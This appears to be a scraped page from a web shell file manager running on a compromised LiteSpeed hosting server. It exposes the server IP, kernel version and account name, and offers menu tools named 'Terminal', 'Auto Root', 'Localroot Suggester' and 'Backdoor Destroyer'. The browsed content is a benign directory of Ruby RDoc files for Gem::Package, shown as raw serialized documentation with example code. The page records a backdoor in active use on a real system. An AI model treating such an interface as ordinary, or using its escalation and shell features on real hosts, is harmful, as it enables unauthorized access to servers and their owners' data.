Linux server1.dn-server.com 4.18.0-553.89.1.lve.el8.x86_64 #1 SMP Wed Dec 10 13:58:50 UTC 2025 x86_64
LiteSpeed
Server IP : 195.201.204.189 & Your IP : 216.73.216.45
Domains :
Cant Read [ /etc/named.conf ]
User : beriska1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby32 /
share /
ri /
system /
Gem /
Package /
Delete
Unzip
Name
Size
Permission
Date
Action
DigestIO
[ DIR ]
drwxr-xr-x
2026-05-05 23:08
Error
[ DIR ]
drwxr-xr-x
2026-05-05 23:08
FormatError
[ DIR ]
drwxr-xr-x
2026-05-05 23:08
NonSeekableIO
[ DIR ]
drwxr-xr-x
2026-05-05 23:08
Old
[ DIR ]
drwxr-xr-x
2026-05-05 23:08
PathError
[ DIR ]
drwxr-xr-x
2026-05-05 23:08
SymlinkError
[ DIR ]
drwxr-xr-x
2026-05-05 23:08
TarHeader
[ DIR ]
drwxr-xr-x
2026-05-05 23:08
TarInvalidError
[ DIR ]
drwxr-xr-x
2026-05-05 23:08
TarReader
[ DIR ]
drwxr-xr-x
2026-05-05 23:08
TarWriter
[ DIR ]
drwxr-xr-x
2026-05-05 23:08
TooLongFileName
[ DIR ]
drwxr-xr-x
2026-05-05 23:08
add_checksums-i.ri
362
B
-rw-r--r--
2026-04-07 17:42
build-c.ri
316
B
-rw-r--r--
2026-04-07 17:42
build-i.ri
390
B
-rw-r--r--
2026-04-07 17:42
cdesc-Package.ri
2.75
KB
-rw-r--r--
2026-04-07 17:42
checksums-i.ri
322
B
-rw-r--r--
2026-04-07 17:42
contents-i.ri
328
B
-rw-r--r--
2026-04-07 17:42
copy_to-i.ri
331
B
-rw-r--r--
2026-04-07 17:42
data_mode-i.ri
308
B
-rw-r--r--
2026-04-07 17:42
dir_mode-i.ri
306
B
-rw-r--r--
2026-04-07 17:42
extract_files-i.ri
509
B
-rw-r--r--
2026-04-07 17:42
files-i.ri
387
B
-rw-r--r--
2026-04-07 17:42
gem-i.ri
305
B
-rw-r--r--
2026-04-07 17:42
gzip_to-i.ri
338
B
-rw-r--r--
2026-04-07 17:42
initialize-i.ri
374
B
-rw-r--r--
2026-04-07 17:42
new-c.ri
536
B
-rw-r--r--
2026-04-07 17:42
normalize_path-i.ri
268
B
-rw-r--r--
2026-04-07 17:42
prog_mode-i.ri
310
B
-rw-r--r--
2026-04-07 17:42
raw_spec-c.ri
399
B
-rw-r--r--
2026-04-07 17:42
read_checksums-i.ri
358
B
-rw-r--r--
2026-04-07 17:42
security_policy-i.ri
362
B
-rw-r--r--
2026-04-07 17:42
setup_signer-i.ri
458
B
-rw-r--r--
2026-04-07 17:42
spec-i.ri
327
B
-rw-r--r--
2026-04-07 17:42
verify-i.ri
682
B
-rw-r--r--
2026-04-07 17:42
verify_entry-i.ri
331
B
-rw-r--r--
2026-04-07 17:42
verify_files-i.ri
328
B
-rw-r--r--
2026-04-07 17:42
Save
Rename
U:RDoc::NormalClass[iI"Package:ETI"Gem::Package;TI"Object;To:RDoc::Markup::Document:@parts[o;;[o:RDoc::Markup::Paragraph;[I"!Example using a Gem::Package;To:RDoc::Markup::BlankLine o; ;[I"MBuilds a .gem file given a Gem::Specification. A .gem file is a tarball ;TI"Owhich contains a data.tar.gz, metadata.gz, checksums.yaml.gz and possibly ;TI"signatures.;T@o:RDoc::Markup::Verbatim;[I"require 'rubygems' ;TI" require 'rubygems/package' ;TI" ;TI"*spec = Gem::Specification.new do |s| ;TI"3 s.summary = "Ruby based make-like utility." ;TI" s.name = 'rake' ;TI" s.version = PKG_VERSION ;TI" s.requirements << 'none' ;TI" s.files = PKG_FILES ;TI" s.description = <<-EOF ;TI"<Rake is a Make-like program implemented in Ruby. Tasks ;TI"=and dependencies are specified in standard Ruby syntax. ;TI" EOF ;TI" end ;TI" ;TI"Gem::Package.build spec ;T:@format0o; ;[I"Reads a .gem file.;T@o;;[ I"require 'rubygems' ;TI" require 'rubygems/package' ;TI" ;TI"1the_gem = Gem::Package.new(path_to_dot_gem) ;TI"1the_gem.contents # get the files in the gem ;TI"Tthe_gem.extract_files destination_directory # extract the gem into a directory ;TI"0the_gem.spec # get the spec out of the gem ;TI"vthe_gem.verify # check the gem is OK (contains valid gem specification, contains a not corrupt contents archive) ;T;0o; ;[I"N#files are the files in the .gem tar file, not the Ruby files in the gem ;TI"<#extract_files and #contents automatically call #verify;T: @fileI"lib/rubygems/package.rb;T:0@omit_headings_from_table_of_contents_below0; 0;0[[ I"checksums;TI"R;T:privateFI"lib/rubygems/package.rb;T[ I"data_mode;TI"RW;T;F@?[ I" dir_mode;T@B;F@?[ I" files;T@>;F@?[ I"gem;T@>;F@?[ I"prog_mode;T@B;F@?[ I"security_policy;T@B;F@?[ [[I"Gem::UserInteraction;To;;[ ; @:;0@?[[I" class;T[[:public[ [:protected[ [;[[I" build;T@?[I"new;T@?[I" raw_spec;T@?[I" instance;T[[;[ [;[ [;[[I"add_checksums;T@?[I" build;T@?[I" contents;T@?[I"copy_to;T@?[I"extract_files;T@?[I"gzip_to;T@?[I"initialize;T@?[I"normalize_path;T@?[I"read_checksums;T@?[I"setup_signer;T@?[I" spec;T@?[I"verify;T@?[I"verify_entry;T@?[I"verify_files;T@?[ [U:RDoc::Context::Section[i 0o;;[ ; 0;0[I"lib/rubygems/package.rb;TI"&lib/rubygems/package/digest_io.rb;TI"(lib/rubygems/package/file_source.rb;TI"&lib/rubygems/package/io_source.rb;TI" lib/rubygems/package/old.rb;TI"#lib/rubygems/package/source.rb;TI"'lib/rubygems/package/tar_header.rb;TI"'lib/rubygems/package/tar_reader.rb;TI"-lib/rubygems/package/tar_reader/entry.rb;TI"'lib/rubygems/package/tar_writer.rb;T@:cRDoc::TopLevel